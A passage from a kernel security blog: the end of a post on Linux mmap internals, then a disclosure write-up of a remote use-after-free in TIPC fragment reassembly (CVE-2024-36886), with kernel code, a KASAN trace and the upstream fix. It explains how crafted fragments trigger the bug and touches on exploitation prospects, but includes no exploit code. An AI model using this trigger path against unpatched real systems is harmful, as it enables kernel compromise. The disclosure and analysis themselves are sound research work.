int security_mmap_file(struct file *file, unsigned long prot,
		       unsigned long flags)
{
	return call_int_hook(mmap_file, file, prot, mmap_prot(file, prot),
			     flags);
}

security/security.c (v6.11.5)

If we look for references to mmap_file, we can see these hooks are registered by the [LSM_HOOK_INIT()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/lsm_hooks.h#L114) macro and that different security modules implement their own mmap_file hooks (e.g. capabilities, apparmor, selinux, smack).

Multiple security modules can be active on a system: the capabilities module is always active, along with any number of “minor” modules and up to one “major” module (e.g. apparmor, selinux). We can check which ones are active via /sys/kernel/security/lsm; the output on my VM is:

$ cat /sys/kernel/security/lsm
lockdown,capability,landlock,yama,apparmor

Of these, the capability and apparmor security modules both define hooks for mmap_file. In this case, both hooks will be run when security_mmap_file() is called.
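If you’d rather check for a specific module programmatically, a small helper along these lines would do. This is only a sketch: lsm_is_active() is a made-up name, and it assumes the file’s contents have already been read into a string in the comma-separated format shown above:

```c
#include <assert.h>
#include <string.h>

/* Returns 1 if `name` is one of the comma-separated entries in `list`. */
static int lsm_is_active(const char *list, const char *name)
{
	size_t name_len = strlen(name);
	const char *p = list;

	while (*p) {
		/* Length of the current entry, up to a ',' or trailing newline. */
		size_t entry_len = strcspn(p, ",\n");

		/* Compare whole entries only, so "cap" won't match "capability". */
		if (entry_len == name_len && strncmp(p, name, name_len) == 0)
			return 1;
		p += entry_len;
		if (*p)       /* skip the ',' or '\n' separator */
			p++;
	}
	return 0;
}
```

With the output from my VM, lsm_is_active(list, "apparmor") would return 1 and lsm_is_active(list, "selinux") would return 0.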

I hope that was interesting, because in our example neither of these checks actually does anything. Capabilities’ [cap_mmap_file()](https://elixir.bootlin.com/linux/v6.11.5/source/security/commoncap.c#L1436) always returns success and apparmor’s [apparmor_mmap_file()](https://elixir.bootlin.com/linux/v6.11.5/source/security/apparmor/lsm.c#L582) only does checks if a file is specified.
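To illustrate the idea of several modules each getting a say, here’s a simplified userspace model of a hook chain. To be clear, this is not the kernel’s call_int_hook() implementation: all the model_ names are made up, and the “deny any file-backed mapping” policy is purely hypothetical. It only shows the general pattern of running each registered hook in turn and bailing on the first non-zero result:

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>

typedef int (*mmap_file_hook_t)(const void *file, unsigned long prot,
				unsigned long flags);

/* Stand-in for a hook that always allows the operation. */
static int model_cap_mmap_file(const void *file, unsigned long prot,
			       unsigned long flags)
{
	(void)file; (void)prot; (void)flags;
	return 0;
}

/* Stand-in for a hook that only cares about file-backed mappings. */
static int model_file_only_mmap_file(const void *file, unsigned long prot,
				     unsigned long flags)
{
	(void)prot; (void)flags;
	if (!file)
		return 0;          /* anonymous mapping: nothing to check */
	return -EACCES;        /* hypothetical policy: deny */
}

/* Run every hook in order; the first non-zero return value wins. */
static int model_call_int_hook(const mmap_file_hook_t *hooks, size_t n,
			       const void *file, unsigned long prot,
			       unsigned long flags)
{
	for (size_t i = 0; i < n; i++) {
		int rc = hooks[i](file, prot, flags);

		if (rc != 0)
			return rc;
	}
	return 0;
}
```

For an anonymous mapping (file == NULL), both model hooks return 0 and the call is allowed, which matches what we see in our example.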

Locking

Before we delve another call deeper into the mm subsystem, let’s quickly talk about locking. The call to [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255) is protected by the mmap write lock [2]:

unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
// SNIP
		if (mmap_write_lock_killable(mm))
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &populate,
			      &uf);
		mmap_write_unlock(mm);

mm/util.c (v6.11.5)

Locking is extremely important within the kernel and is used to protect shared resources by serialising access or preventing concurrent writes. Insufficient locking can lead to all sorts of undefined behaviour and security issues.

[mmap_write_lock_killable()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117) provides a wrapper for the mm->mmap_lock, which is a R/W semaphore. In layman’s terms, multiple “readers” can take this lock (i.e. if the calling code is just planning to read the protected resource) or a single writer can [7].
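The “many readers or one writer” rule can be sketched as a tiny state machine. This is a toy model for illustration only: the model_ names are made up, it’s not thread-safe and it has none of the waiting or fairness logic of the kernel’s real rw_semaphore:

```c
#include <assert.h>
#include <stdbool.h>

struct model_rwsem {
	int readers;     /* number of readers currently holding the lock */
	bool writer;     /* true while a writer holds the lock */
};

/* Readers may share the lock, as long as no writer holds it. */
static bool model_read_trylock(struct model_rwsem *sem)
{
	if (sem->writer)
		return false;
	sem->readers++;
	return true;
}

/* A writer needs exclusive access: no readers and no other writer. */
static bool model_write_trylock(struct model_rwsem *sem)
{
	if (sem->writer || sem->readers > 0)
		return false;
	sem->writer = true;
	return true;
}

static void model_read_unlock(struct model_rwsem *sem)
{
	assert(sem->readers > 0);
	sem->readers--;
}

static void model_write_unlock(struct model_rwsem *sem)
{
	assert(sem->writer);
	sem->writer = false;
}
```

So two model_read_trylock() calls in a row both succeed, but a model_write_trylock() fails until every reader has dropped the lock.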

So what does the mmap lock actually protect? That’s a great question and I’m not sure there’s a definitive, detailed “specification” or anything for this (?). More generally though, it protects access to a process’ address space. We’ll understand more about what that entails as we delve deeper, but think adding/changing/removing mappings as well as other fields within the mm structure too [8].

For the curious, the _killable suffix indicates that the process can be killed while waiting for the lock [9][10], in which case the function returns an error, which is caught here and turned into -EINTR.

1. https://man7.org/linux/man-pages/man2/mmap.2.html
2. If you’re testing this at home, be mindful that other places will call do_mmap(), particularly when running a program
3. https://docs.kernel.org/admin-guide/mm/hugetlbpage.html
4. https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053
5. https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849
6. https://docs.kernel.org/admin-guide/LSM/index.html
7. Check out Linux Inside’s deep dive into semaphores here.
8. LWN has a good article, “The ongoing search for mmap_lock scalability” (2022), on the importance of the mmap_lock and attempts to scale it
9. The _killable variant for rw semaphores was actually added in 2016, you can check out the initial patch series for details
10. “The Linux Kernel Locking API and Shared Objects” (2021) by Packt is a nice resource on locking if you want to dive into the topic a bit more

Next Time

Hopefully this isn’t too much of a cliffhanger, but this post has been in my drafts for far too long now and I fear if I don’t post it soon it’ll never get finished 💀.

I went for a bit of a different approach with this topic, due to the scope of the mm subsystem. The aim was to use a simple case study to provide some structure and context to an otherwise complex topic. I also wanted to present an approach and workflow that could perhaps be transferable to researching other parts of the kernel, if that makes sense?

If folks are interested in a part 2, we’ll continue to delve deeper into the mm subsystem, carrying on where we left off with do_mmap(). We’ve barely scratched the surface so far! I’d love to go into more detail on how mappings are represented and managed within the kernel and then move onto paging and who knows what other topics we stumble into.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

ZDI-24-821: A Remote UAF in The Kernel's net/tipc

sam4k — Wed, 03 Jul 2024 13:59:40 +0000

While preparing for my talk at TyphoonCon, about how to find bugs in the Linux kernel, I discovered a neat little vulnerability in the kernel’s TIPC networking stack.

I found this while playing around with syzkaller as part of the research for my talk; I felt like it would only be fair to find some bugs to share if I’m doing a talk about it :)

I picked the TIPC protocol for a few reasons: it had low coverage, net surface is fun, it’s not enabled by default (not out here trying to find critical RCEs for a slide example) plus I have some previous experience working with the protocol.

In this post I’m mainly going to be talking about the vulnerability itself, remediation and maybe I’ll go a little bit into exploitation cos I can’t help myself. If I can find the time, I’d love to do a future post talking more about the discovery process and exploitation.

Overview
- Timeline
Background Stuff
- net/ Basics
  - struct sk_buff
  - struct skb_shared_info
- TIPC Primer
The Vulnerability
Exploitation
Fix + Remediation
Wrapup

Overview

The vulnerability allows a local or remote attacker to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel.

Only systems with the TIPC module built (CONFIG_TIPC=y/CONFIG_TIPC=m) and loaded are vulnerable. Additionally, in order to be vulnerable to a remote attack the system must have TIPC configured on an interface reachable by an attacker.

The flaw exists in the implementation of TIPC message fragment reassembly, specifically tipc_buf_append(). The function carries out the reassembly by chaining the fragmented packet buffers together. It takes the first fragment as the head buffer and then processes subsequent fragments sequentially, adding their packet buffers onto the head buffer’s chain.

The vulnerability occurs due to a missing check in the error handling cleanup. On error, the reassembly will bail, freeing both the head buffer (and its chained buffers) and the latest fragment buffer currently being processed. If the latest fragment buffer has already been added to the head buffer’s chain at this point, it will lead to a use-after-free.

The vulnerability was introduced in commit 1149557d64c9 (Mar 2015) and fixed in commit 080cbb890286 (May 2024), affecting kernel versions 4 through to 6.8.

It was assigned ZDI-24-821 and CVE-2024-36886 (shoutout to the insane description formatting on that one).

Timeline

2024-03-23: Case opened with ZDI
2024-04-25: Case reviewed by ZDI
2024-04-25: Case disclosed to the vendor
2024-05-02: Fix published by the vendor
2024-06-20: Coordinated public release of ZDI advisory

Background Stuff

Before we dive into the juicy details, I’m going to cover some background information to provide some additional context to the vulnerability. Feel free to skip this if you’re already familiar with the networking subsystem and TIPC basics!

`net/` Basics

So to kick things off let’s try and give a bit of background on some of the networking subsystem fundamentals, as this is where the TIPC protocol is implemented!

I say try, because this subsystem is pretty complex and there’s a lot of ground to cover. But in short, the networking subsystem does what it says on the tin: provides networking capability to the kernel. And it does it in a way which is modular and extensible, providing a core API to implement various networking devices, protocols and interfaces.

`struct sk_buff`

One of the fundamental structures that the kernel provides is [struct sk_buff](https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L842) which represents a network packet and its status. The structure is created when a kernel packet is received, either from the user space or from the network interface.[3]

The kernel documentation honestly does a great job unpacking this rather complicated structure, so I’d recommend checking that out (up to the checksum section at least).

Essentially, struct sk_buff itself stores various metadata and the actual packet data is stored in associated buffers. A large part of the complexity surrounding the structure is how these buffers, and the relevant pointers to them, are accessed and manipulated.

`struct skb_shared_info`

One of the features baked into this core API is packet fragmentation, the idea that a protocol’s data may be split across several packets - so we have a situation where some data is fragmented across the data buffers of several struct sk_buffs.

This is where [struct skb_shared_info](https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572) comes in!

/* This data is invariant across clones and lives at
 * the end of the header data, ie. at skb->end.
 */
struct skb_shared_info {
	__u8		flags;
	__u8		meta_len;
	__u8		nr_frags;
	__u8		tx_flags;
	unsigned short	gso_size;
	/* Warning: this field is not always filled in (UFO)! */
	unsigned short	gso_segs;
	struct sk_buff	*frag_list;
	struct skb_shared_hwtstamps hwtstamps;
	unsigned int	gso_type;
	u32		tskey;

	/*
	 * Warning : all fields before dataref are cleared in __alloc_skb()
	 */
	atomic_t	dataref;
	unsigned int	xdp_frags_size;

	/* Intermediate layers must ensure that destructor_arg
	 * remains valid until skb destructor */
	void *		destructor_arg;

	/* must be last field, see pskb_expand_head() */
	skb_frag_t	frags[MAX_SKB_FRAGS];
};

include/linux/skbuff.h (6.7.4)

Among other things, this allows a packet to keep track of its fragments! Relevant to us is frag_list, used to link struct sk_buff headers together for reassembly.
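As a rough mental model of how fragments hang off a head buffer, here’s a stripped-down userspace sketch. It’s a simplification under a few assumptions: in the real kernel frag_list lives in struct skb_shared_info rather than in the skb itself, and model_skb, model_chain_frag() and model_total_len() are made-up names:

```c
#include <assert.h>
#include <stddef.h>

struct model_skb {
	unsigned int len;              /* bytes held by this buffer alone */
	struct model_skb *next;        /* next buffer in a fragment chain */
	struct model_skb *frag_list;   /* head only: first chained fragment */
};

/* Append `frag` to the end of `head`'s fragment chain. */
static void model_chain_frag(struct model_skb *head, struct model_skb *frag)
{
	struct model_skb **link = &head->frag_list;

	assert(head && frag);
	while (*link)
		link = &(*link)->next;
	frag->next = NULL;
	*link = frag;
}

/* Total payload across the head buffer and every chained fragment. */
static unsigned int model_total_len(const struct model_skb *head)
{
	unsigned int total = head->len;

	for (const struct model_skb *f = head->frag_list; f; f = f->next)
		total += f->len;
	return total;
}
```

The key takeaway is that once a fragment is on the chain, the head buffer is the thing that “owns” it, which will matter a lot later on.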

TIPC Primer

Transparent Inter Process Communication (TIPC) is an IPC mechanism designed for intra-cluster communication, originating from Ericsson where it has been used in carrier grade cluster applications for many years. Cluster topology is managed around the concept of nodes and the links between these nodes.

TIPC communications are done over a “bearer”, which is a TIPC abstraction of a network interface. A “media” is a bearer type, of which there are four currently supported: Ethernet, Infiniband, UDP/IPv4 and UDP/IPv6.

A local attacker is able to set up a UDP bearer as an unprivileged user via netlink, as demonstrated by bl@sty during his work on CVE-2021-43267[1]. However, a remote attacker is restricted by whatever bearers are already set up on a system.

TIPC messages have their own header, of which there are several formats outlined in the specification[2]. A common theme is the concept of message “user” which defines their purpose (see “Figure 4: TIPC Message Types”[2]) and can be used to infer the format of the TIPC message.

There is a handshake to establish a link between nodes (see “Link Creation”[2]). An established link is required to reach the vulnerable code. This essentially involves sending three messages to: advertise the node, reset the state and then set the state.

The Vulnerability

🤓

For this example I’m going to be assuming a local attacker interacting with message fragmentation over a UDP bearer, after establishing a link, on a 6.7.4 kernel.

The TIPC protocol features message fragmentation, where a single TIPC message can be split into fragments and sent to its destination via several packets:

When a message is longer than the identified MTU of the link it will use, it is split up in fragments, each being sent in separate packets to the destination node. Each fragment is wrapped into a packet headed by an TIPC internal header […] The User field of the header is set to MSG_FRAGMENTER, and each fragment is assigned a Fragment Number relative to the first fragment of the message. Each fragmented message is also assigned a Fragmented Message Number, to be present in all fragments. […] At reception the fragments are reassembled so that the original message is recreated, and then delivered upwards to the destination port. [1]

So essentially, each fragment is wrapped up in a TIPC fragment message (a message with the MSG_FRAGMENTER user). Each of these fragment messages will provide metadata in its header, such as the fragment number, so that the fragment within can be reassembled in the right order on the receiving end.

Exploring The Call Trace

Let’s take a look at the kernel call trace for a MSG_FRAGMENTER message being received by a TIPC UDP bearer. This gives us a bit of context about how the TIPC networking stack handles incoming packets:

#0 tipc_link_input+0x41b/0x850 net/tipc/link.c:1339
#1 tipc_link_rcv+0x77a/0x2dc0 net/tipc/link.c:1839
#2 tipc_rcv+0x519/0x3030 net/tipc/node.c:2159
#3 tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
#4 udp_queue_rcv_one_skb+0xe76/0x19b0 net/ipv4/udp.c:2113
#5 udp_queue_rcv_skb+0x136/0xa60 net/ipv4/udp.c:2191

#5 & #4 show the underlying UDP networking stack stuff. #3, tipc_udp_recv(), is where TIPC first receives inbound TIPC-over-UDP messages; it does some basic bearer level checks before handing the skb over to #2, tipc_rcv().

After bearer level checks, all inbound TIPC packets are processed by #2, tipc_rcv(). This involves sanity checks on TIPC header values and using a combination of message user and link state to figure out how the packet is going to be processed.

A valid MSG_FRAGMENTER message is received by #1, tipc_link_rcv():

int tipc_link_rcv(struct tipc_link *l, struct sk_buff *skb,
          struct sk_buff_head *xmitq)
{
    struct sk_buff_head *defq = &l->deferdq;
    struct tipc_msg *hdr = buf_msg(skb);
    u16 seqno, rcv_nxt, win_lim;
    int released = 0;
    int rc = 0;

    /* Verify and update link state */
    if (unlikely(msg_user(hdr) == LINK_PROTOCOL))
        return tipc_link_proto_rcv(l, skb, xmitq);

    /* Don't send probe at next timeout expiration */
    l->silent_intv_cnt = 0;

    do {
        hdr = buf_msg(skb);
        seqno = msg_seqno(hdr);                                                 [0]
        rcv_nxt = l->rcv_nxt;                                                   [1]
        win_lim = rcv_nxt + TIPC_MAX_LINK_WIN;

        if (unlikely(!link_is_up(l))) {
            if (l->state == LINK_ESTABLISHING)
                rc = TIPC_LINK_UP_EVT;
            kfree_skb(skb);
            break;
        }

        /* Drop if outside receive window */
        if (unlikely(less(seqno, rcv_nxt) || more(seqno, win_lim))) {           [2]
            l->stats.duplicates++;
            kfree_skb(skb);
            break;
        }
        released += tipc_link_advance_transmq(l, l, msg_ack(hdr), 0,
                              NULL, NULL, NULL, NULL);

        /* Defer delivery if sequence gap */
        if (unlikely(seqno != rcv_nxt)) {                                       [3]
            if (!__tipc_skb_queue_sorted(defq, seqno, skb))
                l->stats.duplicates++;
            rc |= tipc_link_build_nack_msg(l, xmitq);
            break;
        }

        /* Deliver packet */
        l->rcv_nxt++;
        l->stats.recv_pkts++;

        if (unlikely(msg_user(hdr) == TUNNEL_PROTOCOL))
            rc |= tipc_link_tnl_rcv(l, skb, l->inputq);
        else if (!tipc_data_input(l, skb, l->inputq))
            rc |= tipc_link_input(l, skb, l->inputq, &l->reasm_buf);            [5]
        if (unlikely(++l->rcv_unacked >= TIPC_MIN_LINK_WIN))
            rc |= tipc_link_build_state_msg(l, xmitq);
        if (unlikely(rc & ~TIPC_LINK_SND_STATE))
            break;
    } while ((skb = __tipc_skb_dequeue(defq, l->rcv_nxt)));                     [4]

    /* Forward queues and wake up waiting users */
    if (released) {
        tipc_link_update_cwin(l, released, 0);
        tipc_link_advance_backlog(l, xmitq);
        if (unlikely(!skb_queue_empty(&l->wakeupq)))
            link_prepare_wakeup(l);
    }
    return rc;
}

net/tipc/link.c (6.7.4)

tipc_link_rcv() uses the sequence number, pulled from the TIPC message header [0], to determine the order in which to process the incoming skbs. It uses struct tipc_link to manage the link state, including what seqno it’s expecting next [1].

Out of order packets are either dropped [2] or added to the defer queue, defq, for later [3] [4]. When the correct seqno is hit, it will do some checks to see how to process it. When the user is MSG_FRAGMENTER, the packet is passed to #0 tipc_link_input() [5].
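The drop/defer/deliver decision can be modelled in isolation. The sketch below is a userspace approximation: the model_ names are made up, MODEL_LINK_WIN is an assumed window size, and the comparison helpers are written the way wrap-around-safe 16-bit sequence comparisons are usually done rather than copied from the kernel:

```c
#include <assert.h>
#include <stdint.h>

#define MODEL_LINK_WIN 8191u   /* assumed window size, for illustration */

enum model_verdict { MODEL_DROP, MODEL_DEFER, MODEL_DELIVER };

/* Wrap-around aware comparisons on 16-bit sequence numbers. */
static int model_less_eq(uint16_t left, uint16_t right)
{
	return (uint16_t)(right - left) < 32768u;
}

static int model_less(uint16_t left, uint16_t right)
{
	return model_less_eq(left, right) && left != right;
}

static int model_more(uint16_t left, uint16_t right)
{
	return !model_less_eq(left, right);
}

/* Same three-way decision as the receive loop: drop, defer or deliver. */
static enum model_verdict model_classify(uint16_t seqno, uint16_t rcv_nxt)
{
	uint16_t win_lim = (uint16_t)(rcv_nxt + MODEL_LINK_WIN);

	if (model_less(seqno, rcv_nxt) || model_more(seqno, win_lim))
		return MODEL_DROP;      /* outside the receive window */
	if (seqno != rcv_nxt)
		return MODEL_DEFER;     /* in window, but there's a gap */
	return MODEL_DELIVER;       /* exactly what we were waiting for */
}
```

Note the wrap-around handling: with rcv_nxt at 65535, a seqno of 2 is treated as slightly ahead (deferred) rather than way behind. This is what makes the defer queue interesting from an attacker’s perspective, as we get some say over when a packet is actually processed.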

tipc_link_input(), #0, processes the packet depending on the user:

static int tipc_link_input(struct tipc_link *l, struct sk_buff *skb,
               struct sk_buff_head *inputq,
               struct sk_buff **reasm_skb)
{
    // snip

    } else if (usr == MSG_FRAGMENTER) {
        l->stats.recv_fragments++;
        if (tipc_buf_append(reasm_skb, &skb)) {
            l->stats.recv_fragmented++;
            tipc_data_input(l, skb, inputq);
        } else if (!*reasm_skb && !link_is_bc_rcvlink(l)) {
            pr_warn_ratelimited("Unable to build fragment list\n");
            return tipc_link_fsm_evt(l, LINK_FAILURE_EVT);
        }
        return 0;
    } // snip
    
    kfree_skb(skb);
    return 0;
}

net/tipc/link.c (6.7.4)

Examining `tipc_buf_append()`

This function is the root cause of the vulnerability. tipc_buf_append() is used to append the buffers containing message fragments, in order to reassemble the original message:

/* tipc_buf_append(): Append a buffer to the fragment list of another buffer
 * @*headbuf: in:  NULL for first frag, otherwise value returned from prev call
 *            out: set when successful non-complete reassembly, otherwise NULL
 * @*buf:     in:  the buffer to append. Always defined
 *            out: head buf after successful complete reassembly, otherwise NULL
 * Returns 1 when reassembly complete, otherwise 0
 */
int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
	struct sk_buff *head = *headbuf;
	struct sk_buff *frag = *buf;
	struct sk_buff *tail = NULL;
	struct tipc_msg *msg;
	u32 fragid;
	int delta;
	bool headstolen;

	if (!frag)
		goto err;

	msg = buf_msg(frag);
	fragid = msg_type(msg);                                     [0]
	frag->next = NULL;
	skb_pull(frag, msg_hdr_sz(msg));

	if (fragid == FIRST_FRAGMENT) {
		if (unlikely(head))
			goto err;
		*buf = NULL;
		if (skb_has_frag_list(frag) && __skb_linearize(frag))
			goto err;
		frag = skb_unshare(frag, GFP_ATOMIC);
		if (unlikely(!frag))
			goto err;
		head = *headbuf = frag;                                 [1]
		TIPC_SKB_CB(head)->tail = NULL;
		return 0;
	}

	if (!head)
		goto err;

	if (skb_try_coalesce(head, frag, &headstolen, &delta)) {    [2]
		kfree_skb_partial(frag, headstolen);
	} else {                                                    [3]
		tail = TIPC_SKB_CB(head)->tail;
		if (!skb_has_frag_list(head))
			skb_shinfo(head)->frag_list = frag;
		else
			tail->next = frag;
		head->truesize += frag->truesize;
		head->data_len += frag->len;
		head->len += frag->len;
		TIPC_SKB_CB(head)->tail = frag;
	}

	if (fragid == LAST_FRAGMENT) {
		TIPC_SKB_CB(head)->validated = 0;
		if (unlikely(!tipc_msg_validate(&head)))                [4]
			goto err;                                           [5]
		*buf = head;
		TIPC_SKB_CB(head)->tail = NULL;
		*headbuf = NULL;
		return 1;
	}
	*buf = NULL;
	return 0;
err:
	kfree_skb(*buf);                                            [6]
	kfree_skb(*headbuf);                                        [7]
	*buf = *headbuf = NULL;
	return 0;
}

net/tipc/msg.c (6.7.4)

Walking through a typical case, when the first fragment is received tipc_buf_append() is called with *headbuf == NULL & *buf pointing to the packet buffer of the first fragment. Note the fragment id (first, last or other) is stored in the TIPC header [0].

For the first fragment, some checks are done, this buffer is used to initialise headbuf [1] and the function returns. For subsequent fragments in this sequence, headbuf is already initialised when tipc_buf_append() is called. These packets are then either coalesced into the head buffer [2] or added to its frag_list [3].

Finally, when the LAST_FRAGMENT is processed and added to the chain, the header of the originally fragmented message is validated [4]. If you recall, the fragmented message is stored within the MSG_FRAGMENTER messages, so it will have its own header that hasn’t been validated yet.

Notably, if this fails (e.g. we intentionally scuff up the header of the fragmented message), we jump to the error path [5] and both buffers are dropped [6] [7]. At this point buf points to the last fragment and headbuf points to the head buffer (the first fragment). As we’ve seen, it is possible for buf to already be in the frag_list of headbuf at this point.

However, kfree_skb() isn’t a simple kfree() wrapper, due to the complexity of struct sk_buff. It involves quite a bit of cleanup, including cleaning up the fragments referenced by the frag_list … you can probably see where this is going!

The last fragment, buf, is freed [6]. Then, the head buffer is freed [7] whereby its frag_list is iterated for cleanup, leading to a use-after-free, as the final fragment has just been freed prior to this call [6]!
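Here’s a toy userspace model of that sequence, which may make the double release easier to see. It’s a sketch under some loud assumptions: all the model_ names are made up, the head is assumed to have an empty frag_list beforehand, and nothing is really freed (we just count “frees” per buffer so the second touch is observable instead of being actual undefined behaviour):

```c
#include <assert.h>
#include <stddef.h>

struct model_skb {
	int free_count;               /* how many times this buffer was "freed" */
	struct model_skb *next;
	struct model_skb *frag_list;
};

/* Like kfree_skb() in spirit: release the buffer and everything chained to it.
 * Nothing is really freed, we only count, so a double free is observable. */
static void model_kfree_skb(struct model_skb *skb)
{
	if (!skb)
		return;
	for (struct model_skb *f = skb->frag_list; f; f = f->next)
		f->free_count++;
	skb->free_count++;
}

/* Pre-patch error path for a chained LAST_FRAGMENT whose validation fails. */
static void model_append_last_frag_invalid(struct model_skb **headbuf,
					   struct model_skb **buf)
{
	struct model_skb *head = *headbuf;
	struct model_skb *frag = *buf;

	assert(head && frag);
	frag->next = NULL;
	head->frag_list = frag;       /* frag is now owned by head's chain */

	/* validation of the reassembled message fails: goto err */
	model_kfree_skb(*buf);        /* releases frag */
	model_kfree_skb(*headbuf);    /* walks frag_list: touches frag again */
	*buf = *headbuf = NULL;
}
```

After running this, the head has a free_count of 1 but the fragment has a free_count of 2. In the real kernel that second touch is the read of segs->next on already-freed memory.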

We can see this by exploring the rest of the call trace when we trigger the bug:

[   48.900496] ==================================================================
[   48.901414] BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x549/0x5c0
[   48.902395] Read of size 8 at addr ffff88800927c900 by task syz_test/207
[   48.903256] 
[   48.903450] CPU: 1 PID: 207 Comm: syz_test Not tainted 6.7.4-gd09175322cfa-dirty #6
[   48.904221] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   48.905046] Call Trace:
[   48.905306]  <TASK>
[   48.905490]  dump_stack_lvl+0x72/0xa0
[   48.905787]  print_report+0xcc/0x620
[   48.906736]  kasan_report+0xb0/0xe0
[   48.907096]  kfree_skb_list_reason+0x549/0x5c0
[   48.909613]  skb_release_data.isra.0+0x4fd/0x850
[   48.909997]  kfree_skb_reason+0xf4/0x380
[   48.910171]  tipc_buf_append+0x3e4/0xad0

The site that triggers KASAN is when the fragmented buffer list is iterated during kfree_skb_list_reason(). It is passed the frag_list of the head buffer in skb_release_data() [0]:

static void skb_release_data(struct sk_buff *skb, enum skb_drop_reason reason,
			     bool napi_safe)
{
	struct skb_shared_info *shinfo = skb_shinfo(skb);
	int i;

    // snip

free_head:
	if (shinfo->frag_list)
		kfree_skb_list_reason(shinfo->frag_list, reason);                       [0]

net/core/skbuff.c (6.7.4)

We can then see the KASAN trigger in kfree_skb_list_reason() here [1]:

void __fix_address
kfree_skb_list_reason(struct sk_buff *segs, enum skb_drop_reason reason)
{
	struct skb_free_array sa;

	sa.skb_count = 0;

	while (segs) {
		struct sk_buff *next = segs->next;                                      [1]

		if (__kfree_skb_reason(segs, reason)) {
			skb_poison_list(segs);
			kfree_skb_add_bulk(segs, &sa, reason);
		}

		segs = next;
	}

	if (sa.skb_count)
		kmem_cache_free_bulk(skbuff_cache, sa.skb_count, sa.skb_array);
}

net/core/skbuff.c (6.7.4)

Variations

There’s a couple of variations to this vulnerability which are worth mentioning. First of all, the vulnerable path can also be reached in a very similar manner via TUNNEL_PROTOCOL messages, as seen in this call trace:

kfree_skb_reason+0xf4/0x380 net/core/skbuff.c:1108
kfree_skb include/linux/skbuff.h:1234 [inline]
tipc_buf_append+0x3ce/0xb50 net/tipc/msg.c:186
tipc_link_tnl_rcv net/tipc/link.c:1398 [inline]
tipc_link_rcv+0x1a89/0x2dc0 net/tipc/link.c:1837
tipc_rcv+0x1220/0x3030 net/tipc/node.c:2173
tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421

Additionally, some eagle-eyed readers may also have noticed there’s another way to trigger the use-after-free within tipc_buf_append():

int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
    // snip

    if (skb_try_coalesce(head, frag, &headstolen, &delta)) {
        kfree_skb_partial(frag, headstolen);                        [0]
    } else {
        tail = TIPC_SKB_CB(head)->tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)->frag_list = frag;
        else
            tail->next = frag;
        head->truesize += frag->truesize;
        head->data_len += frag->len;
        head->len += frag->len;
        TIPC_SKB_CB(head)->tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)->validated = 0;
        if (unlikely(!tipc_msg_validate(&head)))
            goto err;
        *buf = head;
        TIPC_SKB_CB(head)->tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    *buf = NULL;
    return 0;
err:
    kfree_skb(*buf);                                                [1]
    kfree_skb(*headbuf);                                            [2]
    *buf = *headbuf = NULL;
    return 0;
}

net/tipc/msg.c (6.7.4)

The initial free can occur at either site [0] or [1]. We’ve covered the latter case, but if the last fragment was coalesced, then the initial free occurs at [0] instead.

TIPC Protocol: 7.2.7. Message Fragmentation

Exploitation

Unfortunately I haven’t had the time to work on putting together an exploit for this vulnerability, though I’d love to set some time aside in the future. Sorry! :(

From an LPE perspective, the use-after-free of a struct sk_buff provides a pretty nice primitive due to its complexity and usage. There have been some nice write-ups in the past making good use of the structure for LPE, so check those out if interested[2].

The RCE side of things is more opaque and something I’m really keen to explore more. Two major roadblocks for Linux kernel RCE are: KASLR and the drastically reduced surface for heap fengshui and generally affecting device state.

At least on the latter, we have some nice flexibility with this vulnerability. We have some control over the affected caches via our TIPC messages. The defer queue could potentially be used to introduce delays and control when objects are freed. Who knows!

Here are some posts on other TIPC related bugs and stuff for interested readers:

Fix + Remediation

---
 net/tipc/msg.c | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/net/tipc/msg.c b/net/tipc/msg.c
index 5c9fd4791c4ba1..9a6e9bcbf69402 100644
--- a/net/tipc/msg.c
+++ b/net/tipc/msg.c
@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 	if (!head)
 		goto err;
 
+	/* Either the input skb ownership is transferred to headskb
+	 * or the input skb is freed, clear the reference to avoid
+	 * bad access on error path.
+	 */
+	*buf = NULL;
 	if (skb_try_coalesce(head, frag, &headstolen, &delta)) {
 		kfree_skb_partial(frag, headstolen);
 	} else {
@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 		*headbuf = NULL;
 		return 1;
 	}
-	*buf = NULL;
 	return 0;
 err:
 	kfree_skb(*buf);

Commit 080cbb890286, authored by kuba-moo

We can see the patch is fairly simple (even if the context is not): the reference to the input skb (buf) is cleared before the error case that can cause the UAF. This is because the block handling the fragment coalescing/chaining already does the appropriate cleanup for it via frag (which at this point is also a reference to the input skb).

It’s a bit clearer if we provide some more context:

    /* Either the input skb ownership is transferred to headskb
     * or the input skb is freed, clear the reference to avoid
     * bad access on error path.
     */
    *buf = NULL;
    if (skb_try_coalesce(head, frag, &headstolen, &delta)) {  [2]
        kfree_skb_partial(frag, headstolen);                  [3]
    } else {                                                  [4]
        tail = TIPC_SKB_CB(head)->tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)->frag_list = frag;
        else
            tail->next = frag;
